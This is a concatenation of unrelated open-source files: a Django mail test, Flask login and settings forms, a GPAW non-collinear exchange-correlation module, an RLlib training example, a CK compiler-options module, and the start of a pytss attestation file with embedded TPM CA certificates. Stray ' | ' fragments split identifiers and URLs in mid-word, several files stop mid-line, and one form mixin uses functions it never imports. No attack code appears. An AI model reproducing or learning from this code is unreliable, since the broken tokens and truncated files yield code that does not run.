settings.EMAIL_BACKEND = "djrill.mail.backends.djrill.DjrillBackend"
with mock.patch('django.core.mail.EmailMultiAlternatives') as mock_mail:
mock_mail.return_value.mandrill_response = [{
"email": "abc@test.com",
"status": "sent",
"_id": "123",
"reject_reason": None,
}]
email_address = get_env_variable('TEST_EMAIL_ADDRESS_2')
enquiry = make_enquiry(
email_address,
"Welcome",
'Can I join your club?',
)
template = _create_goodbye_mandrill_template()
content_data = {
email_address: {
"name": "Fred",
"title": "SpaceX",
"question": enquiry.description
}
}
queue_mail_template(e | nquiry, template.slug, content_data)
m = _mail(enquiry)
assert m.sent is None
assert m.sent_response_code is None
assert m.message.subject == 'Goodbye *|name|*'
# test the send facility using djrill mail backend
# temp_email_backend = settings.EMAIL_BACKEND
send_mail()
m = _mail(enquiry)
assert m.sent is not None
assert m.sent_response_code is not None
@pytest.mark.django_db
def test_queue_no_email():
email_add | ress = get_env_variable('TEST_EMAIL_ADDRESS_1')
enquiry = make_enquiry(
email_address,
"Farming",
'How many cows in the field?',
)
with pytest.raises(MailError) as e:
queue_mail_message(
enquiry,
[],
enquiry.subject,
enquiry.description,
)
expect = "Cannot 'queue_mail_message' without 'email_addresses'"
assert expect in str(e.value)
@pytest.mark.django_db
def test_send_mail():
enquiry = _queue_enquiry()
m = _mail(enquiry)
assert m.sent is None |
paulfantom/Central-Heating-webpage | app/core/forms.py | Python | mpl-2.0 | 3,303 | 0.009385 | from flask_wtf import Form
from wtforms.fields.html5 import DecimalRangeField
from wtforms.fields import TextField, SubmitField, DateTimeField, DecimalField,\
HiddenField, BooleanField, PasswordField
from wtforms import ValidationError
from wtforms.validators import Optional, EqualTo, Required, Length
from flask import request
from flask.ext.babel import lazy_gettext as _
from app import babel
class NextFormMixin():
next = HiddenField()
def validate_next(self, field):
if field.data and not validate_redirect_url(field.data):
field.data = ''
flash(*get_message('INVALID_REDIRECT'))
r | aise ValidationError(get_message('INVALID_REDIRECT')[0])
class LoginForm(Form,NextFormMixin):
username = TextField(_('Username'),validators=[Required()],descrip | tion=_('Username'))
password = PasswordField(_('Password'),validators=[Required()],description=_('Password'))
remember = BooleanField(_('Remember me'))
next = HiddenField()
submit = SubmitField(_('Login'))
def __init__(self, *args, **kwargs):
super(LoginForm, self).__init__(*args, **kwargs)
if not self.next.data:
self.next.data = request.args.get('next', '')
self.remember.default = False
# self.remember.default = config_value('DEFAULT_REMEMBER_ME')
def validate(self):
if not super(LoginForm, self).validate():
return False
if self.username.data.strip() == '':
self.username.errors.append(_("No username provided"))
return False
if self.password.data.strip() == '':
self.password.errors.append(_("No password provided"))
return False
return True
class RangeForm(Form):
    """Single-slider form submitting one decimal value."""

    slider = DecimalRangeField('Slider', validators=[Required()])
    submit = SubmitField(_('Save'))
class PasswordForm(Form):
    """Password-change form: new password typed twice, minimum 8 characters."""

    password = PasswordField(
        _('New password'),
        [
            Required(),
            Length(min=8, message='Password too short. Minimum 8 signs'),
            EqualTo('confirm', message=_('Passwords must match')),
        ],
        description=_("New password"))
    confirm = PasswordField(_('Repeat password'),
                            description=_("Repeat password"))
    next = HiddenField()
    submit = SubmitField(_('Change'))
class OptionsForm(Form):
    """Maintenance actions exposed on the options page."""

    # NOTE(review): description=True is a bool, not text — confirm the
    # template really expects a truthy flag here rather than a string.
    apparent = SubmitField("",
                           validators=[Optional()],
                           description=True)
    reset_pass = SubmitField(_('Reset password'), validators=[Optional()])
    reboot = SubmitField(_('Reboot HMI'), validators=[Optional()])
    # reboot_mcu = SubmitField(_('Reboot MCU'), validators=[Optional()])
class WeekForm(Form):
    """Weekday selector: one submit button per day (day_1 = Monday)."""

    day_1 = SubmitField(_('Monday'), validators=[Optional()])
    day_2 = SubmitField(_('Tuesday'), validators=[Optional()])
    day_3 = SubmitField(_('Wednesday'), validators=[Optional()])
    day_4 = SubmitField(_('Thursday'), validators=[Optional()])
    day_5 = SubmitField(_('Friday'), validators=[Optional()])
    day_6 = SubmitField(_('Saturday'), validators=[Optional()])
    day_7 = SubmitField(_('Sunday'), validators=[Optional()])
class RowForm(Form):
    """One schedule row: a time interval plus a target temperature."""

    time_from = DateTimeField(format="%H:%M")
    time_to = DateTimeField(format="%H:%M")
    temperature = DecimalField(places=1, use_locale=True)
|
robwarm/gpaw-symm | gpaw/xc/noncollinear.py | Python | gpl-3.0 | 13,580 | 0.001105 | from math import sqrt, pi
import numpy as np
from gpaw.xc.functional import XCFunctional
from gpaw.xc.lda import LDA
from gpaw.xc.libxc import LibXC
from gpaw.lcao.eigensolver import LCAO
from gpaw.wavefunctions.lcao import LCAOWaveFunctions
from gpaw.utilities import unpack
from gpaw.utilities.blas import gemm
from gpaw.mixer import BaseMixer
from gpaw.utilities.tools import tri2full
from gpaw.sphere.lebedev import Y_nL, weight_n
from gpaw.xc.pawcorrection import rnablaY_nLv
X = np.newaxis
class NonCollinearLDAKernel(LibXC):
    # Non-collinear LDA kernel: maps the four-component density
    # (n, m_x, m_y, m_z) onto an effective collinear spin-up/down problem
    # along the local magnetization direction, then transforms the
    # potentials back.
    def __init__(self):
        LibXC.__init__(self, 'LDA')

    def calculate(self, e_g, n_sg, dedn_sg,
                  sigma_xg=None, dedsigma_xg=None,
                  tau_sg=None, dedtau_sg=None):
        # n_sg holds (density, m_x, m_y, m_z); m_g is the magnetization norm.
        n_g = n_sg[0]
        m_vg = n_sg[1:4]
        m_g = (m_vg**2).sum(0)**0.5
        # Effective collinear spin densities: n± = (n ± |m|) / 2.
        nnew_sg = np.empty((2,) + n_g.shape)
        nnew_sg[:] = n_g
        nnew_sg[0] += m_g
        nnew_sg[1] -= m_g
        nnew_sg *= 0.5
        vnew_sg = np.zeros_like(nnew_sg)
        # Evaluate the ordinary (collinear) LDA kernel on n±.
        LibXC.calculate(self, e_g, nnew_sg, vnew_sg)
        # Chain rule back: dE/dn = (v+ + v-)/2 and
        # dE/dm_v = (v+ - v-)/2 * m_v/|m|.
        dedn_sg[0] += 0.5 * vnew_sg.sum(0)
        # Guard against 0/0 where the magnetization vanishes.
        vnew_sg /= np.where(m_g < 1e-15, 1, m_g)
        dedn_sg[1:4] += 0.5 * vnew_sg[0] * m_vg
        dedn_sg[1:4] -= 0.5 * vnew_sg[1] * m_vg
class NonCollinearFunctional(XCFunctional):
    # Wrap a collinear XC functional so it can be applied to a
    # non-collinear four-component density (n, m_x, m_y, m_z).
    # Naming convention in this file (inferred from usage): trailing
    # "_g" = radial/grid index, "_v" = Cartesian component, "_L" = angular
    # momentum channel, "_q" = radial basis function, "_p"/"_s" = packed /
    # spin indices — TODO confirm against GPAW conventions.
    def __init__(self, xc):
        XCFunctional.__init__(self, xc.name)
        self.xc = xc
        self.type = xc.type

    def calculate(self, gd, n_sg, dedn_sg=None, e_g=None):
        # Map (n, m) to effective collinear spin densities n± = (n ± |m|)/2,
        # evaluate the wrapped functional, then chain-rule the potentials
        # back onto (n, m).  Returns the integrated XC energy.
        n_g = n_sg[0]
        m_vg = n_sg[1:4]
        m_g = (m_vg**2).sum(0)**0.5
        nnew_sg = gd.empty(2)
        nnew_sg[:] = n_g
        nnew_sg[0] += m_g
        nnew_sg[1] -= m_g
        nnew_sg *= 0.5
        vnew_sg = gd.zeros(2)
        if e_g is None:
            e_g = gd.empty()
        exc = self.xc.calculate(gd, nnew_sg, vnew_sg, e_g)
        if dedn_sg is not None:
            dedn_sg[0] += 0.5 * vnew_sg.sum(0)
            # Avoid division by zero where the magnetization vanishes.
            vnew_sg /= np.where(m_g < 1e-15, 1, m_g)
            dedn_sg[1:4] += 0.5 * vnew_sg[0] * m_vg
            dedn_sg[1:4] -= 0.5 * vnew_sg[1] * m_vg
        return exc

    def calculate_paw_correction(self, setup, D_sp, dEdD_sp=None,
                                 addcoredensity=True, a=None):
        # PAW correction: difference of all-electron and pseudo radial
        # expansions minus the reference atomic value Exc0.
        c = setup.xc_correction
        if c is None:
            return 0.0
        assert addcoredensity
        # Four components expected: density + three magnetization directions.
        assert len(D_sp) == 4
        assert c.nc_corehole_g is None
        rgd = c.rgd
        # Spherical core densities carry a sqrt(4*pi) normalization factor.
        nc0_g = sqrt(4 * pi) * c.nc_g
        nct0_g = sqrt(4 * pi) * c.nct_g
        D_sLq = np.inner(D_sp, c.B_pqL.T)
        e, dEdD_sqL = self.calculate_radial_expansion(rgd, D_sLq, c.n_qg,
                                                      nc0_g)
        et, dEtdD_sqL = self.calculate_radial_expansion(rgd, D_sLq, c.nt_qg,
                                                        nct0_g)
        if dEdD_sp is not None:
            dEdD_sp += np.inner((dEdD_sqL - dEtdD_sqL).reshape((4, -1)),
                                c.B_pqL.reshape((len(c.B_pqL), -1)))
        return e - et - c.Exc0

    def calculate_radial_expansion(self, rgd, D_sLq, n_qg, nc0_g):
        # Integrate the XC energy over angles using Lebedev quadrature
        # (weight_n, Y_nL) and accumulate dE/dD for each spin component.
        D_Lq = D_sLq[0]
        M_vLq = D_sLq[1:]
        n_Lg = np.dot(D_Lq, n_qg)
        n_Lg[0] += nc0_g
        m_vLg = np.dot(M_vLq, n_qg)
        if self.xc.type == 'GGA':
            # Radial derivatives are only needed for gradient corrections.
            dndr_Lg = np.empty_like(n_Lg)
            rgd.derivative(n_Lg, dndr_Lg)
            dmdr_vLg = np.empty_like(m_vLg)
            rgd.derivative(m_vLg, dmdr_vLg)
        elif self.xc.type == 'LDA':
            dndr_Lg = None
            dmdr_vLg = None
        Lmax, nq = D_Lq.shape
        dEdD_sqL = np.zeros((4, nq, Lmax))
        E = 0.0
        for w, Y_L, rnablaY_Lv in zip(weight_n,
                                      Y_nL[:, :Lmax],
                                      rnablaY_nLv[:, :Lmax]):
            if self.xc.type == 'LDA':
                (e_g, dedn_g, dedm_vg) = \
                    self.calculate_radial(rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
                                          m_vLg, dmdr_vLg)
            else:
                (e_g, dedn_g, dedm_vg,
                 a_g, b_vg, c_g, d_vg, dedsigma_xg, dcdm_vg, dddm_vLvg,
                 m_vg, m_g) = \
                    self.calculate_radial(rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
                                          m_vLg, dmdr_vLg)
            # Local (LDA-like) contributions to the derivatives.
            dEdD_sqL[0] += np.dot(rgd.dv_g * dedn_g,
                                  n_qg.T)[:, X] * (w * Y_L)
            dEdD_sqL[1:] += np.dot(rgd.dv_g * dedm_vg,
                                   n_qg.T)[:, :, X] * (w * Y_L)
            if self.xc.type == 'GGA':
                # Gradient terms: radial part for the density channel ...
                v_g = rgd.empty()
                rgd.derivative2(rgd.dv_g * (dedsigma_xg[0] * (a_g + c_g) +
                                            dedsigma_xg[1] * a_g +
                                            dedsigma_xg[2] * (a_g - c_g)), v_g)
                dEdD_sqL[0] -= np.dot(v_g, n_qg.T)[:, X] * (0.5 * w * Y_L)
                B_vg = (dedsigma_xg[0] * (b_vg + d_vg) +
                        dedsigma_xg[1] * b_vg +
                        dedsigma_xg[2] * (b_vg - d_vg))
                B_vq = np.dot(B_vg * rgd.dr_g, n_qg.T)
                dEdD_sqL[0] += 2 * pi * w * np.dot(rnablaY_Lv, B_vq).T
                # ... and for the magnetization channels.
                A_g = (dedsigma_xg[0] * (a_g + c_g) -
                       dedsigma_xg[1] * c_g +
                       dedsigma_xg[2] * (c_g - a_g)) * rgd.dv_g
                v_vg = rgd.empty(3)
                rgd.derivative2(A_g * m_vg / m_g, v_vg)
                v_vg -= A_g * dcdm_vg
                dEdD_sqL[1:] -= np.dot(v_vg, n_qg.T)[:, :, X] * (0.5 * w * Y_L)
                dedsigma_xg *= rgd.dr_g
                B_vg = (dedsigma_xg[0] * (b_vg + d_vg) -
                        dedsigma_xg[1] * d_vg +
                        dedsigma_xg[2] * (d_vg - b_vg))
                B_Lvq = np.dot((B_vg[:, X, X] * dddm_vLvg).sum(0), n_qg.T)
                dEdD_sqL[1:] += 2 * pi * w * B_Lvq.transpose((1, 2, 0))
            E += w * rgd.integrate(e_g)
        return E, dEdD_sqL

    def calculate_radial(self, rgd, n_Lg, Y_L, dndr_Lg, rnablaY_Lv,
                         m_vLg, dmdr_vLg):
        # Evaluate the wrapped kernel along one angular direction Y_L.
        # For GGA, also build sigma = |grad n±|^2 combinations and return
        # the intermediate quantities needed by the caller's chain rule.
        n_g = np.dot(Y_L, n_Lg)
        m_vg = np.dot(Y_L, m_vLg)
        m_g = (m_vg**2).sum(0)**0.5
        # Floor |m| to avoid division by zero further down.
        eps = 1e-15
        m_g[m_g < eps] = eps
        n_sg = rgd.empty(2)
        n_sg[:] = n_g
        n_sg[0] += m_g
        n_sg[1] -= m_g
        n_sg *= 0.5
        e_g = rgd.empty()
        dedn_sg = rgd.zeros(2)
        if self.xc.type == 'GGA':
            dmdr_vg = np.dot(Y_L, dmdr_vLg)
            a_g = np.dot(Y_L, dndr_Lg)
            b_vg = np.dot(rnablaY_Lv.T, n_Lg)
            c_g = (m_vg * dmdr_vg).sum(0) / m_g
            m_vvg = np.dot(rnablaY_Lv.T, m_vLg)
            d_vg = (m_vg * m_vvg).sum(1) / m_g
            sigma_xg = rgd.empty(3)
            sigma_xg[0] = ((b_vg + d_vg)**2).sum(0)
            sigma_xg[1] = ((b_vg + d_vg) * (b_vg - d_vg)).sum(0)
            sigma_xg[2] = ((b_vg - d_vg)**2).sum(0)
            # Angular gradients carry a 1/r factor; copy the first point
            # from the second to avoid dividing by r = 0.
            sigma_xg[:, 1:] /= rgd.r_g[1:]**2
            sigma_xg[:, 0] = sigma_xg[:, 1]
            sigma_xg[0] += (a_g + c_g)**2
            sigma_xg[1] += (a_g + c_g) * (a_g - c_g)
            sigma_xg[2] += (a_g - c_g)**2
            sigma_xg *= 0.25
            dedsigma_xg = rgd.zeros(3)
            self.xc.kernel.calculate(e_g, n_sg, dedn_sg, sigma_xg, dedsigma_xg)
        else:
            self.xc.kernel.calculate(e_g, n_sg, dedn_sg)
        dedn_g = 0.5 * dedn_sg.sum(0)
        dedn_sg /= m_g
        dedm_vg = 0.5 * (dedn_sg[0] - dedn_sg[1]) * m_vg
        if self.xc.type == 'GGA':
            # Derivatives of the c and d intermediates w.r.t. m, needed by
            # calculate_radial_expansion for the gradient back-propagation.
            dcdm_vg = (dmdr_vg - (m_vg * dmdr_vg).sum(0) * m_vg / m_g**2) / m_g
            dddm_vLvg = rnablaY_Lv.T[:, :, X, X] * m_vg
            dddm_vLvg += m_vvg[:, X] * Y_L[:, X, X]
            dddm_vLvg -= d_vg[:, X, X, :] * m_vg[X, X] * Y_L[:, X, X] / m_g
            dddm_vLvg /= m_g
            return (e_g, dedn_g, dedm_vg,
                    a_g, b_vg, c_g, d_vg, dedsigma_xg, dcdm_vg, dddm_vLvg,
                    m_vg, m_g)
        return e_g, dedn_g, dedm_vg
class NonCollinearLCAOEigensolver(LCAO):
def calculate |
robertnishihara/ray | rllib/examples/mobilenet_v2_with_lstm.py | Python | apache-2.0 | 1,849 | 0 | # Explains/tests Issues:
# https:/ | /github.c | om/ray-project/ray/issues/6928
# https://github.com/ray-project/ray/issues/6732
import argparse
from gym.spaces import Discrete, Box
import numpy as np
from ray.rllib.agents.ppo import PPOTrainer
from ray.rllib.examples.env.random_env import RandomEnv
from ray.rllib.examples.models.mobilenet_v2_with_lstm_models import \
MobileV2PlusRNNModel, TorchMobileV2PlusRNNModel
from ray.rllib.models import ModelCatalog
from ray.rllib.utils.framework import try_import_tf
tf1, tf, tfv = try_import_tf()

# Input image shape for the TF model: (height, width, channels).
cnn_shape = (4, 4, 3)
# The torch version of MobileNetV2 does channels first.
cnn_shape_torch = (3, 224, 224)

parser = argparse.ArgumentParser()
# --torch switches both the framework and the custom model class.
parser.add_argument("--torch", action="store_true")

if __name__ == "__main__":
    args = parser.parse_args()

    # Register our custom model.
    ModelCatalog.register_custom_model(
        "my_model", TorchMobileV2PlusRNNModel
        if args.torch else MobileV2PlusRNNModel)

    # Configure our Trainer.
    config = {
        "framework": "torch" if args.torch else "tf",
        "model": {
            "custom_model": "my_model",
            # Extra config passed to the custom model's c'tor as kwargs.
            "custom_model_config": {
                "cnn_shape": cnn_shape_torch if args.torch else cnn_shape,
            },
            "max_seq_len": 20,
        },
        "vf_share_layers": True,
        "num_workers": 0,  # no parallelism
        "env_config": {
            "action_space": Discrete(2),
            # Test a simple Image observation space.
            "observation_space": Box(
                0.0,
                1.0,
                shape=cnn_shape_torch if args.torch else cnn_shape,
                dtype=np.float32)
        },
    }

    # Run a single training iteration on the random (dummy) env and print
    # the result dict; this exercises the model end-to-end.
    trainer = PPOTrainer(config=config, env=RandomEnv)
    print(trainer.train())
|
ctuning/ck-autotuning | module/compiler/module.py | Python | bsd-3-clause | 28,151 | 0.032148 | #
# Collective Knowledge (compiler choices)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
cfg={}   # Will be updated by CK (meta description of this module)
work={}  # Will be updated by CK (temporal data: paths, module UIDs, ...)
ck=None  # Will be updated by CK (initialized CK kernel)

# Local settings
##############################################################################
# Initialize module
def init(i):
    """Initialize this CK module (no-op).

    Input:  {} - ignored

    Output: {
              return - return code = 0 (always successful)
            }
    """
    return {'return': 0}
##############################################################################
# extract choices to universal pipeline tuning
def extract_to_pipeline(i):
    """Extract compiler flag choices into a universal autotuning pipeline.

    Input:  {
              (data_uoa) - compiler description
              (file_in)  - JSON pipeline template
              (file_out) - output prepared pipeline to this file
            }

    Output: {
              return   - return code = 0, if successful
                           > 0, if error
              (error)  - error text if return > 0

              pipeline - prepared pipeline
            }
    """
    # Fix: 'os' was never imported at module level, so the default template
    # path below raised NameError; import it locally (CK module style).
    import os

    fo=i.get('file_out','')
    fi=i.get('file_in','')
    duoa=i.get('data_uoa','')

    # Prepare pipeline template
    ck.out('Preparing pipeline template ...')

    if fi=='':
        fi=os.path.join(work['path'],cfg['pipeline_template'])

    r=ck.load_json_file({'json_file':fi})
    if r['return']>0: return r
    pipeline=r['dict']

    # Load or select compiler description
    ck.out('')
    ck.out('Selecting compiler and description ...')

    if duoa=='':
        rx=ck.access({'action':'search',
                      'module_uoa':work['self_module_uid']})
        if rx['return']>0: return rx

        lst=rx['lst']

        if len(lst)==0:
            duoa=''
        elif len(lst)==1:
            duid=lst[0]['data_uid']
            duoa=lst[0]['data_uoa']
        else:
            # Interactive selector when several descriptions match.
            ck.out('')
            ck.out('Multiple choices available:')
            ck.out('')
            r=ck.select_uoa({'choices':lst})
            if r['return']>0: return r
            duoa=r['choice']

    if duoa=='':
        return {'return':1, 'error':'no compiler description selected'}

    # Load compiler description entry.
    rx=ck.access({'action':'load',
                  'module_uoa':work['self_module_uid'],
                  'data_uoa':duoa})
    if rx['return']>0: return rx

    d=rx['dict']
    dsc=rx.get('desc',{})

    dx=dsc.get('all_compiler_flags_desc',{})

    # Update pipeline choices with the compiler flags, prefixing keys with
    # '##compiler_flags' so they land in the right part of the pipeline.
    ck.out('')
    ck.out('Updating pipeline choices with compiler flags ...')

    if 'pipeline' not in pipeline: pipeline['pipeline']={}
    px=pipeline['pipeline']

    px['choices_desc']={}
    for q in dx:
        qq=dx[q]
        q1=q
        if q1.startswith('##'): q1=q1[1:]
        q1='##compiler_flags'+q1
        px['choices_desc'][q1]=qq

    # Optionally save the prepared pipeline.
    if fo!='':
        ck.out('')
        ck.out('Writing pipeline ...')
        rx=ck.save_json_to_file({'json_file':fo, 'dict':pipeline})
        if rx['return']>0: return rx

    return {'return':0, 'pipeline':pipeline}
##############################################################################
# extract optimization flags and parameters from a compiler for autotuning (currently GCC)
# Note: GCC sources are needed - this script searches for GCC opts in all sub-directories
# in a current directory. Therefore, just untar all GCC sources in current directory.
#
# (partially based on scripts from Abdul Wahid Memon and Yuriy Kashnikov)
def extract_opts(i):
"""
Input: {
(record) - if 'yes, record to repo
(repo_uoa) - repo UOA to record compiler description
(data_uoa) - data UOA to record compiler description (if empty, autogenerate)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import os
import sys
import datetime
o=i.get('out','')
p=os.getcwd()
f1a=cfg['gcc_src_opt_file1']
f1b=cfg['gcc_src_opt_file2']
f2=cfg['gcc_src_params']
results={}
# Checking if GCC
try:
dirList=os.listdir(p)
except Exception as | e:
None
else:
for fn in dirList:
pp=os.path.join(p, fn)
if os.path.isdir(pp) and fn.startswith('gcc-'):
| found=False
p1a=os.path.join(pp,f1a)
p1b=os.path.join(pp,f1b)
p2=os.path.join(pp,f2)
if os.path.isfile(p1a) or os.path.isfile(p1b) or os.path.isfile(p2):
# Found GCC source directory with needed files
ck.out('*************************************')
ck.out('Processing GCC directory: '+fn)
ck.out('')
ver=fn[4:]
lver=ver.split('.')
dd={}
iopt=0
iparam=0
p1=''
if os.path.isfile(p1a):
p1=p1a
elif os.path.isfile(p1b):
p1=p1b
if p1!='':
# Load opt file
rx=ck.load_text_file({'text_file':p1,
'split_to_list':'yes',
'encoding':sys.stdin.encoding})
if rx['return']>0: return rx
lopts=rx['lst']
found=False
for q in range(0, len(lopts)):
qq=lopts[q].strip()
if not found:
if qq=='@item Optimization Options':
ck.out('Found optimization flags')
found=True
else:
if qq.startswith('@end ') or qq=='':
break
if qq.startswith('@gccoptlist{'):
qq=qq[11:]
elif qq.startswith('@'):
continue
if qq.endswith('@gol'):
qq=qq[:-5]
jj=qq.split(' ')
# Check if base flag
if len(jj)>0 and jj[0].startswith('-O'):
choice=[]
if '-O3' in jj: choice.append('-O3')
for j in jj:
if j!='' and j!='-O3' and j!='-O':
if j.endswith('}'): j=j[:-1].strip()
choice.append(j)
dd["##base_opt"]={
"choice": choice,
"default": "",
"desc": "base compiler flag",
"sort": 10000,
"tags": [
"base",
"basic",
"optimization"
],
"type": "text"
}
else:
for j in jj:
if j!='' and not j.startswith('--param') and not j.startswith('@') and j.startswith('-f') and \
j.find('profile')==-1 and j.find('coverage')==-1:
|
JohnVillalovos/python-tss-1 | pytss/attestationutils.py | Python | apache-2.0 | 36,880 | 0.000705 | from pytss import TspiContext
from tspi_defines import *
import tspi_exceptions
import uuid
import M2Crypto
from M2Crypto import m2
import pyasn1
import hashlib
import os
import struct
import base64
well_known_secret = bytearray([0] * 20)
srk_uuid = uuid.UUID('{00000000-0000-0000-0000-000000000001}')
trusted_ | certs = { "STM1": """-----BEGIN CERTIFICATE-----
MIIDzDCCArSgAwIBAgIEAAAAATANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJD
SDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMRswGQYDVQQDExJTVE0g
VFBNIEVLIFJvb3QgQ0EwHhcNMDkwNzI4MDAwMDAwWhcNMjkxMjMxMDAwMDAwWjBV
MQswCQYDVQQGEwJDSDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMSYw
JAYDVQQDEx1TVE0gVFBNIEVLIEludGVybWVkaWF0ZSBDQSAwMTCCASIwDQYJKoZI
hvcNAQEBBQADggEPADCCAQoCggEBAJQY | nWO8iw955vWqakWNr3YyazQnNzqV97+l
Qa+wUKMVY+lsyhAyOyXO31j4+clvsj6+JhNEwQtcnpkSc+TX60eZvLhgZPUgRVuK
B9w4GUVyg/db593QUmP8K41Is8E+l32CQdcVh9go0toqf/oS/za1TDFHEHLlB4dC
joKkfr3/hkGA9XJaoUopO2ELt4Otop12aw1BknoiTh1+YbzrZtAlIwK2TX99GW3S
IjaCi+fLoXyK2Fmx8vKnr9JfNL888xK9BQfhZzKmbKm/eLD1e1CFRs1B3z2gd3ax
pW5j1OIkSBMOIUeip5+7xvYo2gor5mxatB+rzSvrWup9AwIcymMCAwEAAaOBrjCB
qzAdBgNVHQ4EFgQU88kVdKbnc/8TvwxrrXp7Zc8ceCAwHwYDVR0jBBgwFoAUb+bF
bAe3bIsKgZKDXMtBHva00ScwRQYDVR0gAQH/BDswOTA3BgRVHSAAMC8wLQYIKwYB
BQUHAgEWIWh0dHA6Ly93d3cuc3QuY29tL1RQTS9yZXBvc2l0b3J5LzAOBgNVHQ8B
Af8EBAMCAAQwEgYDVR0TAQH/BAgwBgEB/wIBADANBgkqhkiG9w0BAQsFAAOCAQEA
uZqViou3aZDGvaAn29gghOkj04SkEWViZR3dU3DGrA+5ZX+zr6kZduus3Hf0bVHT
I318PZGTml1wm6faDRomE8bI5xADWhPiCQ1Gf7cFPiqaPkq7mgdC6SGlQtRAfoP8
ISUJlih0UtsqBWGql4lpk5G6YmvAezguWmMR0/O5Cx5w8YKfXkwAhegGmMGIoJFO
oSzJrS7jK2GnGCuRG65OQVC5HiQY2fFF0JePLWG/D56djNxMbPNGTHF3+yBWg0DU
0xJKYKGFdjFcw0Wi0m2j49Pv3JD1f78c2Z3I/65pkklZGu4awnKQcHeGIbdYF0hQ
LtDSBV4DR9q5GVxSR9JPgQ==
-----END CERTIFICATE-----""" ,
"STM2": """-----BEGIN CERTIFICATE-----
MIIDzDCCArSgAwIBAgIEAAAAAzANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJD
SDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMRswGQYDVQQDExJTVE0g
VFBNIEVLIFJvb3QgQ0EwHhcNMTEwMTIxMDAwMDAwWhcNMjkxMjMxMDAwMDAwWjBV
MQswCQYDVQQGEwJDSDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMSYw
JAYDVQQDEx1TVE0gVFBNIEVLIEludGVybWVkaWF0ZSBDQSAwMjCCASIwDQYJKoZI
hvcNAQEBBQADggEPADCCAQoCggEBAJO3ihn/uHgV3HrlPZpv8+1+xg9ccLf3pVXJ
oT5n8PHHixN6ZRBmf/Ng85/ODZzxnotC64WD8GHMLyQ0Cna3MJF+MGJZ5R5JkuJR
B4CtgTPwcTVZIsCuup0aDWnPzYqHwvfaiD2FD0aaxCnTKIjWU9OztTD2I61xW2LK
EY4Vde+W3C7WZgS5TpqkbhJzy2NJj6oSMDKklfI3X8jVf7bngMcCR3X3NcIo349I
Dt1r1GfwB+oWrhogZVnMFJKAoSYP8aQrLDVl7SQOAgTXz2IDD6bo1jga/8Kb72dD
h8D2qrkqWh7Hwdas3jqqbb9uiq6O2dJJY86FjffjXPo3jGlFjTsCAwEAAaOBrjCB
qzAdBgNVHQ4EFgQUVx+Aa0fM55v6NZR87Yi40QBa4J4wHwYDVR0jBBgwFoAUb+bF
bAe3bIsKgZKDXMtBHvaO0ScwRQYDVR0gAQH/BDswOTA3BgRVHSAAMC8wLQYIKwYB
BQUHAgEWIWh0dHA6Ly93d3cuc3QuY29tL1RQTS9yZXBvc2l0b3J5LzAOBgNVHQ8B
Af8EBAMCAAQwEgYDVR0TAQH/BAgwBgEB/wIBATANBgkqhkiG9w0BAQsFAAOCAQEA
4gllWq44PFWcv0JgMPOtyXDQx30YB5vBpjS0in7f/Y/r+1Dd8q3EZwNOwYApe+Lp
/ldNqCXw4XzmO8ZCVWOdQdVOqHZuSOhe++Jn0S7M4z2/1PQ6EbRczGfw3dlX63Ec
cEnrn6YMcgPC63Q+ID53vbTS3gpeX/SGpngtVwnzpuJ5rBajqSQUo5jBTBtuGQpO
Ko6Eu7U6Ouz7BVgOSn0mLbfSRb77PjOLZ3+97gSiMmV0iofS7ufemYqA8sF7ZFv/
lM2eOe/eeS56Jw+IPsnEU0Tf8Tn9hnEig1KP8VByRTWAJgiEOgX2nTs5iJbyZeIZ
RUjDHQQ5onqhgjpfRsC95g==
-----END CERTIFICATE-----""",
"NTC1": """-----BEGIN CERTIFICATE-----
MIIDSjCCAjKgAwIBAgIGAK3jXfbVMA0GCSqGSIb3DQEBBQUAMFIxUDAcBgNVBAMT
FU5UQyBUUE0gRUsgUm9vdCBDQSAwMTAlBgNVBAoTHk51dm90b24gVGVjaG5vbG9n
eSBDb3Jwb3JhdGlvbjAJBgNVBAYTAlRXMB4XDTEyMDcxMTE2MjkzMFoXDTMyMDcx
MTE2MjkzMFowUjFQMBwGA1UEAxMVTlRDIFRQTSBFSyBSb290IENBIDAxMCUGA1UE
ChMeTnV2b3RvbiBUZWNobm9sb2d5IENvcnBvcmF0aW9uMAkGA1UEBhMCVFcwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDoNqxhtD4yUtXhqKQGGZemoKJy
uj1RnWvmNgzItLeejNU8B6fOnpMQyoS4K72tMhhFRK2jV9RYzyJMSjEwyX0ASTO1
2yMti2UJQS60d36eGwk8WLgrFnnITlemshi01h9t1MOmay3TO1LLH/3/VDKJ+jbd
cbfIO2bBquN8r3/ojYUaNSPj6pK1mmsMoJXF4dGRSEwb/4ozBIw5dugm1MEq4Zj3
GZ0YPg5wyLRugQbt7DkUOX4FGuK5p/C0u5zX8u33EGTrDrRz3ye3zO+aAY1xXF/m
qwEqgxX5M8f0/DXTTO/CfeIksuPeOzujFtXfi5Cy64eeIZ0nAUG3jbtnGjoFAgMB
AAGjJjAkMA4GA1UdDwEB/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMA0GCSqG
SIb3DQEBBQUAA4IBAQBBQznOPJAsD4Yvyt/hXtVJSgBX/+rRfoaqbdt3UMbUPJYi
pUoTUgaTx02DVRwommO+hLx7CS++1F2zorWC8qQyvNbg7iffQbbjWitt8NPE6kCr
q0Y5g7M/LkQDd5N3cFfC15uFJOtlj+A2DGzir8dlXU/0qNq9dBFbi+y+Y3rAT+wK
fktmN82UT861wTUzDvnXO+v7H5DYXjUU8kejPW6q+GgsccIbVTOdHNNWbMrcD9yf
oS91nMZ/+/n7IfFWXNN82qERsrvOFCDsbIzUOR30N0IP++oqGfwAbKFfCOCFUz6j
